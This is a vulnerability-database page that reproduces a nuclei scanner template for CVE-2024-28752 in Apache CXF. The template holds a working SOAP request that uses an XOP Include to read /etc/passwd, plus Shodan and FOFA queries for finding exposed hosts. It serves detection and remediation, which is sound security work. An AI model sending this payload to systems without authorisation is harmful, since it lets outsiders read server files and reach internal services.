Lucene search
K

Apache CXF < 4.0.4 - Aegis DataBinding SSRF / Local File Read

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

Apache CXF before 4.0.4 allows SSRF and local file read via Aegis DataBinding.

Related
Refs
Code
id: CVE-2024-28752

info:
  name: Apache CXF < 4.0.4 - Aegis DataBinding SSRF / Local File Read
  author: maciejklimek
  severity: high
  description: |
    Apache CXF before 4.0.4, 3.6.3 and 3.5.8 has a Server-Side Request Forgery (SSRF) vulnerability when using the Aegis DataBinding. The XOP Include mechanism in multipart SOAP requests can be abused to read local files or make server-side HTTP requests to arbitrary URLs. An attacker can use this to access sensitive internal resources.
  impact: |
    An attacker can read arbitrary files from the server and make server-side requests to internal services.
  remediation: Upgrade Apache CXF to version 4.0.4, 3.6.3, or 3.5.8 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-28752
    - https://github.com/advisories/GHSA-qmgx-j96g-4428
    - https://github.com/ReaJason/CVE-2024-28752
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-28752
    epss-score: 0.05849
    epss-percentile: 0.92274
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.component:"Apache CXF"
    fofa-query: body="Apache CXF"
  tags: cve,cve2024,apache,cxf,ssrf,lfi

http:
  - raw:
      - |
        POST /test HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/related; boundary=----nucleibound

        ------nucleibound
        Content-Disposition: form-data; name="1"

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://service.namespace/">
           <soapenv:Header/>
           <soapenv:Body>
              <web:test>
                 <arg0>
        <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///etc/passwd"></xop:Include></count>
        </arg0>
              </web:test>
           </soapenv:Body>
        </soapenv:Envelope>
        ------nucleibound--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Unmarshalling Error"

      - type: regex
        part: body
        regex:
          - "cm9vd[A-Za-z0-9+/=]+"

      - type: word
        part: content_type
        words:
          - "text/xml"
# digest: 4b0a00483046022100ffa948ae8559021a66723c524dfbeb519e0f344f9e603736730711f6c58769e6022100b2910f126094f12684757da990b49d30fb1538a7584d31e7c3dad8bdfe06b36a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Mar 2026 15:55Current
7High risk
Vulners AI Score7
CVSS 3.19.3
EPSS0.05849
SSVC
10